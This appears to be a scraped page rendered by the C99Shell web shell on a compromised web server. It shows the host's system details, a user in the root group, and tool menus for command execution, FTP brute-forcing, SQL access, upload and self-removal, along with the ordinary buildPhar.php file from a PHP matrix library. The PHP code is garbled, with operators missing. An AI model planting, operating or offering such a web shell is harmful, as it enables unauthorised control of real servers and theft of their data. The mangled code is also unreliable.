!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/markbaker/matrix/   drwxr-xr-x
Free 28.65 GB of 117.98 GB (24.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     buildPhar.php (1.33 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

# required: PHP 5.3+ and zlib extension

// ini option check
if (ini_get('phar.readonly')) {
    echo 
"php.ini: set the 'phar.readonly' option to 0 to enable phar creation\n";
    exit(
1);
}

// output name
$pharName 'Matrix.phar';

// target folder
$sourceDir __DIR__ DIRECTORY_SEPARATOR 'classes' DIRECTORY_SEPARATOR 'src' DIRECTORY_SEPARATOR;

// default meta information
$metaData = array(
    
'Author'      => 'Mark Baker <mark@lange.demon.co.uk>',
    
'Description' => 'PHP Class for working with Matrix numbers',
    
'Copyright'   => 'Mark Baker (c) 2013-' date('Y'),
    
'Timestamp'   => time(),
    
'Version'     => '0.1.0',
    
'Date'        => date('Y-m-d')
);

// cleanup
if (file_exists($pharName)) {
    echo 
"Removed: {$pharName}\n";
    
unlink($pharName);
}

echo 
"Building phar file...\n";

// the phar object
$phar = new Phar($pharNamenull'Matrix');
$phar->buildFromDirectory($sourceDir);
$phar->setStub(
<<<'EOT'
<?php
    spl_autoload_register(function ($className) {
        include 'phar://' . $className . '.php';
    });

    try {
        Phar::mapPhar();
    } catch (PharException $e) {
        error_log($e->getMessage());
        exit(1);
    }

    include 'phar://functions/sqrt.php';

    __HALT_COMPILER();
EOT
);
$phar->setMetadata($metaData);
$phar->compressFiles(Phar::GZ);

echo 
"Complete.\n";

exit();

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.006 ]--